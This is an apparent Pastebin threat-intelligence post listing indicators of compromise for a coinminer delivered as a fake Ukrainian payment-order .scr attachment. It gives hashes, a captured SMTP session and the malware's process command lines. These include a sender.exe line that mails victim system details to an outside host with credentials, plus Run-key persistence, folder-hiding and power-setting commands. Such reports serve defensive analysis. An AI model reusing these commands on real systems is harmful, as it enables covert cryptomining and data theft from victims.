Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #coinminer #bmcon #SCR
- https://pastebin.com/eTPuCkhC
- previous contact:
- https://pastebin.com/ELpZTc1y
- attack_vector
- --------------
- email attach > SCR > C:\Intel\*
- email_headers
- --------------
- n/a
- files
- --------------
- SHA-256 fd32435ce01a45ddc600edd467787586712408978f0807c12dc622824eb2f93e
- File name Платіжне доручення 1C №14343676173 - 2019.rar [RAR archive data, vd4,]
- File size 735.93 KB
- SHA-256 5850342390bb431b1a0dc364156bff767444cf50987a4c743ff9a29b79e3a10e
- File name Платіжне доручення 1C №14343676173 - 2019.scr [PE32 executable (GUI) Intel 80386, for MS Windows]
- File size 793.76 KB
- SHA-256 40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34
- File name bmcon.exe [Intel 80386, for MS Windows, UPX compressed]
- File size 354.5 KB (363008 bytes)
- SHA-256 1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918
- File name sender.exe [Intel 80386, for MS Windows]
- File size 220 KB (225280 bytes)
- SHA-256 b4633ffa43df5e8887714ce7dd580f80455050a552de4665ab1fdafd13c36ca7
- File name bm-xmrig.exe [PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows]
- File size 750.5 KB (768512 bytes)
- activity
- **************
- SEND SMTP_587
- --------------
- 220 vserver321.axc.nl ESMTP Exim 4.91 Wed, 20 Mar 2019 15:55:26 +0100
- EHLO apm11
- 250-vserver321.axc.nl Hello apm11 [victim-Public-IP]
- 250-SIZE 52428800
- 250-8BITMIME
- 250-PIPELINING
- 250-AUTH PLAIN LOGIN
- 250-STARTTLS
- 250 HELP
- AUTH PLAIN AHNlbmRlckBkb3dubG9hZC1maWxlcy5zaXRlAGVwc2lsb25lcmlkYW5h
- 235 Authentication succeeded
- MAIL FROM:<sender@download-files.site> BODY=8BITMIME
- 250 OK
- RCPT TO:<recipient@account-identification.site>
- 250 Accepted
- DATA
- 354 Enter message, ending with "." on a line by itself
- Date: Tue, 19 Mar 2019 14:39:17 +0200
- From: Robot Ukr<sender@download-files.site>
- To: recipient@account-identification.site
- X-Mailer: Blat v3.0.7, a Win32 SMTP/NNTP mailer http://www.blat.net
- Message-ID: <01d4de50$Blat.v3.0.7$c4997ae5$478b0b0efc2@download-files.site>
- Subject: PC-APM11/User-support
- MIME-Version: 1.0
- Content-Transfer-Encoding: quoted-printable
- Content-Type: text/plain;
- charset="UTF-8"
- OS-Windows7 x64/CPU-*** 2.50GHz/Cores-2/G=
- PU-...................... VGA ...................... ..............
- .
- 250 OK id=1h6ccp-002kK0-KG
- QUIT
- 221 vserver321.axc.nl closing connection
- netwrk
- --------------
- http
- 93.184.221.240 ctldl.windowsupdate.com GET /msdownload/update/v3/static/... HTTP/1.1 Microsoft-CryptoAPI/6.1
- 178.18.231.122 isrg.trustid.ocsp.identrust.com GET /MFEwTzBNMEswSTAJBgUrD... HTTP/1.1 Microsoft-CryptoAPI/6.1
- 178.18.231.114 ocsp.int-x3.letsencrypt.org GET /MFMwUTBPME0wSzAJBgUrD... HTTP/1.1 Microsoft-CryptoAPI/6.1
- 93.184.221.240 ctldl.windowsupdate.com GET /msdownload/update/v3/static/t... HTTP/1.1 Microsoft-CryptoAPI/6.1
- 178.18.231.121 crl.microsoft.com GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1 Microsoft-CryptoAPI/6.1
- ssl
- 88.99.38.225 dl.browsermine.com Client Hello
- comp
- --------------
- bmcon.exe 3064 TCP localhost 49518 88.99.38.225 443 ESTABLISHED
- bmcon.exe 3064 TCP localhost 49519 93.184.221.240 80 ESTABLISHED
- bmcon.exe 3064 TCP localhost 49520 178.18.231.122 80 ESTABLISHED
- bmcon.exe 3064 TCP localhost 49521 178.18.231.114 80 ESTABLISHED
- bmcon.exe 3064 TCP localhost 49522 88.99.38.225 443 ESTABLISHED
- bm-xmrig.exe 1776 TCP localhost 49524 159.69.189.115 4444 ESTABLISHED
- svchost.exe 244 TCP localhost 49525 93.184.221.240 80 ESTABLISHED
- svchost.exe 244 TCP localhost 49526 178.18.231.121 80 ESTABLISHED
- proc
- --------------
- "C:\Users\operator\Desktop\Платіжне доручення 1C №14343676173 - 2019.scr" /S
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- C:\Windows\SysWOW64\cmd.exe ""C:\Intel\enable.cmd" "
- C:\Windows\SysWOW64\reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Интегрированные_драйвера" /f
- C:\Windows\SysWOW64\powercfg.exe -setacvalueindex SCHEME_CURRENT 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 0
- C:\Windows\SysWOW64\powercfg.exe -change -standby-timeout-ac 0
- C:\Windows\SysWOW64\powercfg.exe -change -hibernate-timeout-ac 0
- C:\Windows\SysWOW64\powercfg.exe -h off
- C:\Windows\SysWOW64\attrib.exe ATTRIB +s +h C:\Intel
- C:\Windows\SysWOW64\attrib.exe ATTRIB +s +h C:\Intel\bmcon
- C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ver
- C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC CPU Get Name /Value|FindStr .
- C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
- C:\Intel\sender.exe -to recipient@account-identification.site -f "Robot Ukr<sender@download-files.site>" -server smtp.download-files.site -port 587 -u sender@download-files.site -pw epsiloneridana -subject "PC-APM11/User-support" -body "OS-Windows7 x64/CPU-*** CPU @ ***GHz/Cores-2/GPU-Стандартный VGA графический адаптер"
- C:\Windows\SysWOW64\reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v private /t reg_sz /d "C:\Intel\private.exe" /f
- C:\Windows\SysWOW64\PING.EXE ping -n 300 127.0.0.1
- C:\Intel\bmcon.exe
- "C:\Intel\bmcon\bmstart.exe" --conf="C:\Intel\bmcon.json"
- "C:\Intel\bmcon\bm-xmrig.exe"
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 19.03.2019 14:39
- #1 BMCon c:\intel\bmcon.exe 03.11.2018 2:42
- #2 private 17.229.13.523.351 18.14.13.5356 Installation 17.19.11.15
- c:\intel\private.exe 20.06.1992 0:22
- drop
- --------------
- C:\Intel\GfxUI.exe.config
- C:\Intel\IGFXDEVLib.dll
- C:\Intel\iglhxa32.vp
- C:\Intel\Impcd.cat
- C:\Intel\IntcDAuC.dll
- C:\Intel\mup.xml
- C:\Intel\private.exe
- C:\Intel\readme-VGA.txt
- C:\Intel\sender.exe
- C:\Intel\Setup2.if2
- C:\Intel\bmcon\apps.json
- C:\Intel\bmcon\bmstart.exe
- C:\Intel\bmcon\bm-xmrig.exe
- C:\Intel\bmcon\bm-xmrig.json
- C:\Intel\bmcon\bm-xmrig-amd.exe
- C:\Intel\bmcon\bm-xmrig-amd.json
- C:\Intel\bmcon\bm-xmrig-nvidia.exe
- C:\Intel\bmcon\bm-xmrig-nvidia.json
- C:\Intel\bmcon\bm-xmrig-nvidia-cuda8.exe
- C:\Intel\bmcon\bm-xmrig-nvidia-cuda10.exe
- C:\Intel\bmcon\bm-xmrig-x32.exe
- C:\Intel\bmcon\nvrtc64_80.dll
- C:\Intel\bmcon\nvrtc64_100_0.dll
- C:\Intel\bmcon\nvrtc-builtins64_80.dll
- C:\Intel\bmcon\nvrtc-builtins64_100.dll
- C:\Intel\bmcon.exe
- C:\Intel\bmcon.json
- # # #
- https://www.virustotal.com/gui/file/fd32435ce01a45ddc600edd467787586712408978f0807c12dc622824eb2f93e/details
- https://www.virustotal.com/gui/file/5850342390bb431b1a0dc364156bff767444cf50987a4c743ff9a29b79e3a10e/details
- https://analyze.intezer.com/#/analyses/b2d98806-3481-4422-9f5c-07ffe8707cde
- https://www.virustotal.com/gui/file/40883e27922d357f0a3f15544ed9623475c9f430435f918d57a212f5bd11da34/details
- https://www.virustotal.com/gui/file/1f56e296848ecb8150b81648551515b89d789cde037db18d153be6003b5a1918/details
- https://www.virustotal.com/gui/file/f887f9c7b425495ad336ca8125a5dd8ee9a9353ce3431407f45d085d76b1be04/details
- https://www.virustotal.com/gui/file/b4633ffa43df5e8887714ce7dd580f80455050a552de4665ab1fdafd13c36ca7/details
- VR
- @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement